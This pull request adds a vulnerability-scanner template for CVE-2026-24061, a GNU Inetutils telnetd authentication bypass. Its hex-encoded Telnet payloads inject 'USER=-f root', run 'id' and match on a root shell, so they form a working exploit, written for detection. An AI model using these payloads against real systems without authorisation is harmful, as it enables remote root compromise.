### PR TITLE
Add CVE-2026-24061: GNU Inetutils telnetd Authentication Bypass

### DIFF
--- a/network/cves/2026/CVE-2026-24061.yaml
+++ b/network/cves/2026/CVE-2026-24061.yaml
@@ -1,0 +1,70 @@
+id: CVE-2026-24061
+
+info:
+  name: GNU Inetutils telnetd <= 2.7 - Authentication Bypass
+  author: darthweather,jarvis-survives
+  severity: critical
+  description: |
+    telnetd in GNU Inetutils through version 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable during Telnet option negotiation. This allows an unauthenticated attacker to gain root shell access.
+  impact: |
+    Successful exploitation allows remote attackers to gain a root shell without any credentials, leading to full system compromise.
+  remediation: |
+    Disable the Telnet service and migrate to SSH. If Telnet must remain enabled, update GNU Inetutils to a patched version when available.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-24061
+    - https://ubuntu.com/security/CVE-2026-24061
+    - https://github.com/Chocapikk/CVE-2026-24061
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-24061
+    cwe-id: CWE-88
+  metadata:
+    verified: true
+    max-request: 6
+    vendor: gnu
+    product: inetutils
+    shodan-query: port:23
+  tags: cve,cve2026,network,telnet,gnu,inetutils,auth-bypass,rce
+
+tcp:
+  - inputs:
+      - type: hex
+        data: "fffb18fffb20fffc23fffb27fffc24"
+        read: 1024
+
+      - type: hex
+        data: "fffa200033383430302c3338343030fff0fffa27000055534552012d6620726f6f74fff0fffa1800585445524d2d323536434f4c4f52fff0"
+        read: 1024
+
+      - type: hex
+        data: "fffd03fffc01fffb22fffa220301000003620304020f05000007621c08020409421a0a027f0b02150c02170d02120e02160f0211100213110000120000fff0fffb1ffffa1f009d0044fff0fffd05fffb21"
+        read: 1024
+
+      - type: hex
+        data: "fffa220107fff0"
+        read: 1024
+
+      - type: hex
+        data: "fffd01fffb00fffc22"
+        read: 1024
+
+      - type: hex
+        data: "69640d0a"
+        read: 1024
+
+    host:
+      - "{{Hostname}}"
+    port: 23,2323
+    read-size: 4096
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "uid=0(root)"
+
+    extractors:
+      - type: regex
+        regex:
+          - "uid=0\\(root\\)[^\r\n]+"


### PR DESCRIPTION
### PR Information

- Added network template for CVE-2026-24061: GNU Inetutils telnetd authentication bypass via USER environment variable injection
- Critical severity (CVSS 9.8) — unauthenticated root shell access via Telnet option negotiation
- Template based on the PoC from @darthweather in #15016 (credited as co-author)
- Tightened matchers to only match on `uid=0(root)` for precision
- Closes #15016

### Template validation

- Hex payloads verified against CVE-2026-24061 PoC from https://github.com/Chocapikk/CVE-2026-24061
- Matcher confirms actual root shell access via `id` command output